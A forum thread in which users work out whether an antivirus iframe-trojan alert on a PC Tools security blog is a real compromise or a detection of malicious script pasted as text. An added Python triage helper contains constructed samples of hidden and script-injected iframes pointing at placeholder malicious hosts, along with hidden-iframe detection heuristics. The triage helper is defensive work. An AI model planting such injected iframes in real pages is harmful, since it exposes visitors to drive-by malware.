False Positive Alert on PCTools Blog

Doing my daily rounds of security blogs I went to hxxp://www.pctools.com/security-news/ and Avast! immediately alerted me to this threat:

hxxp://www.pctools.com/security-news/l>{gzip}
High Threat: HTML:IFrame-EL [Trj]

Perhaps the site has been compromised OR this is a False Positive.

EDIT: I have run a few site tests and all report clean bar the Avast! Alert.


Welcome to the forums, Issviews :slight_smile:

Apparently, it was a real infection as the page/link has been taken down.

See the image below and click it to enlarge it.


Thanks for the welcome ;D

Perhaps it was a real infection, but only Avast identified this and still does, contrary to other AV results! It has been pointed out that this could be a false positive detecting an HTML element on the web page in error. See: http://www.mywot.com/en/forum/8965-pctools-blog-flags-trohan-alert

The post that “giedrius” made here is on the mark.

Although some things I would question:

The code actually looks to be posted in full. (the obfuscated forms)

Detection of malware spreading with iframes from HTML code is poor at best.
I would disagree; this is one of the main vectors for spreading malware nowadays, with sites hacked daily, and AV companies are always looking to combat this.

Because the code is posted directly (and by the looks of it in full) it also exists in the source code. This means that when avast! scans the page, it will see that code and generate an alert.

This is exactly the reason that I (and others here) recommend the posting of malicious code as images, as this problem will not arise.

The original page you mentioned now redirects to the home page. Is that what it normally did? If it used to show a preview of the posts, it also could have caused an alert.

Scott
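The distinction Scott draws above (code that is really in the page source versus a sample that is merely quoted) is something a scanner's alert alone does not tell you. The triage helper below is an added example, not avast!'s detection logic or anything from the PC Tools site: it walks a fetched page with Python's HTML parser and separates iframe tags the browser would actually render (and whether they are hidden) from iframe strings inside scripts and from escaped text that only displays the code. The sample page and the hidden-style heuristics are constructed for illustration.

```python
"""Triage: is an <iframe> in a page a live element or just quoted text?
Added example; the regex, heuristics and SAMPLE_PAGE are constructed."""
from html.parser import HTMLParser
import re

class IframeTriage(HTMLParser):
    """Classifies iframe occurrences as 'live' (a real tag the browser renders),
    'in_script' (an iframe string inside <script>, e.g. document.write payloads)
    or 'quoted' (escaped text such as &lt;iframe&gt; that only displays code)."""
    def __init__(self):
        super().__init__(convert_charrefs=True)  # &lt;iframe&gt; -> "<iframe" in text
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            a = dict(attrs)
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = ("display:none" in style or "visibility:hidden" in style
                      or a.get("width") == "0" or a.get("height") == "0")
            self.findings.append({"kind": "live", "src": a.get("src"), "hidden": hidden})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Text nodes and script bodies: an "<iframe ...>" here is not a rendered tag.
        for m in re.finditer(r"<iframe\b[^>]*>", data, re.I):
            kind = "in_script" if self._in_script else "quoted"
            self.findings.append({"kind": kind, "snippet": m.group(0)[:60]})

def triage(html):
    p = IframeTriage(); p.feed(html); p.close()
    return p.findings

def verdict(findings):
    kinds = {f["kind"] for f in findings}
    if any(f["kind"] == "live" and f["hidden"] for f in findings):
        return "live hidden iframe: treat as a real injection"
    if "in_script" in kinds:
        return "iframe written from script: review the script by hand"
    if "quoted" in kinds:
        return "only quoted/escaped code: likely a signature match on a pasted sample"
    return "no iframe indicators"

SAMPLE_PAGE = """<html><body><p>Write-up of a compromised site (constructed sample):</p>
<pre>&lt;iframe src="http://malicious.example/in.php" width="0" height="0"&gt;&lt;/iframe&gt;</pre>
<script>document.write('<iframe src="http://malicious.example/x" style="display: none"></iframe>');</script>
<iframe src="http://video.example/embed" width="400" height="300"></iframe>
<iframe src="http://malicious.example/y" style="visibility:hidden"></iframe>
</body></html>"""
```

On the sample, the escaped `<pre>` block is reported as quoted, the `document.write` string as in_script, and the two real tags as live (one visible, one hidden), so the verdict is driven by the hidden live tag rather than by the pasted write-up.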


Off topic:
Coincidentally, having looked at that blog post, it shows images of a malicious site that I have seen in another thread here: http://forum.avast.com/index.php?topic=68953.0

No, it did not redirect to the homepage at all and did show a preview of security related articles written by PC Tools. I have checked the security news page just now and Avast still bounces up with an alert. Perhaps they have suffered the same attack that Geeks 2 Go had late last year too, with implanted HTML elements.

I still cannot get it to produce an alert on that page, for me it just redirects to pctools.com

No, it did not redirect to the homepage at all and did show a preview of security related articles written by PC Tools.
Yes, then this would explain the detection on that page, as it is loading a preview of the page that it does alert on (the holiday blog post.)

I do get the alert (might be linked to a reported script as reported above)

I too am getting the same alert on the page as Logos.

However I’m unable to actually access the file content to have it analysed at virustotal or other sites as I normally do, as for some reason I can’t access the unp9999999.tmp file.

Maybe my computer is too secure… ;D It always goes to the home page for me…no idea why…

From reading the blog post and what Issviews has said, I think the alert originates from this blog post:
hXXp://www.pctools.com/security-news/fancy-a-work-from-home-scam-with-that-holiday/

This post is then previewed on the …/security-news/ page causing the alert there also.

Hardly too secure, as yours is going somewhere whereas ours doesn't go anywhere; it is stopped dead in its tracks.

Haha, probably…was more of a joke :wink:

Malzilla picks up the redirect, and the page reports 301 - moved permanently

Also:
Webshield report file.


07/01/2011 14:46:22	hXXp://www.pctools.com/security-news [+] is OK
07/01/2011 14:46:22	hXXp://www.pctools.com/security-news/ [+] is OK
07/01/2011 14:46:22	hXXp://www.pctools.com/ [+] is OK

Just checked this page again using my previous Firefox bookmark and lo and behold the URL now hits hXXp://blog.pctools.com/freeav/page/2/ and also on the main blog page at hXXp://blog.pctools.com, which both report 3 simultaneous avast alerts saying the same details as in my OP!

Having looked at the page, it redirects me to /security-news/ and that gives me an alert now…but I still think it is down to the blog post with the script that is posted within it.

Hello,
there is a bad script pasted as plain text, so it would be better if they used an image instead of this text.

Milos

Thanks Milos,

They are aware of this, I have posted a comment on the blog.

One thing I would like to know is does avast! detect all of the scripts?
When I tested the page, it only seemed to alert on one; I was hoping it would have been alerting on all of them. Would you take a look at the scripts and see if they are added?

Scott

Thanks all, for the feedback :slight_smile:

On using my FF bookmark I now get redirected to the PC Tools homepage. Hopefully they will fix the script error and their blog will be back to normal.